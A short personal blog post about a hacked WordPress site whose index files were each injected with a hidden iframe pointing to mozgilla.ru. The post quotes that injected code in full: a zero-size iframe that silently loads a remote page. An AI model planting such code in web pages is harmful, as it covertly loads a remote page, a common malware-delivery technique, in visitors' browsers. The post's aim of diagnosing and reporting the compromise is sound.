mozgilla hack – index.* files corrupted
This just recently happened to me (last night actually), I think my host got hacked. I have no idea why or how.
OK, so straight to the point. This morning my blog – a wordpress installation – was dead. I was getting whether an “access denied” or “you don’t have permission to access…”. First I thought that the blog got screwed somehow and I tried to go into the admin panel (e.g. georgezamfir.com/wp-admin/)… aaand I got the same error code. Crap. At this point I was clueless, I searched online for any netfirms issues, I thought they messed up something, nothing.
All right, back to basics, I FTP-ed to my host to take a look at the files and this is when I realized that all my index.* (index.php, index.html, index.htm, etc) files were screwed. There were no permissions set and they all contained some code linking to mozgilla.ru – that code was not familiar to me. Duh, I don’t use iframes. There isn’t much online on this thing except for this page: badwarebusters.org/main/itemview/11308.
I was having the exact same code in my files:
<iframe frameborder=”0″ onload=”if (!this.src){ this.src=’http://mozgilla.ru:8080/index.php’; this.height=’0′; this.width=’0′;}” >klsgawbozfesywooikgbcetdnwaubys</iframe>
However, in the .php files the code above was at the very end of the files but in the .html files the code was right after the <body> tag.
get this feed
|
2 comments |
tags: hack, index files, mozgilla, wordpress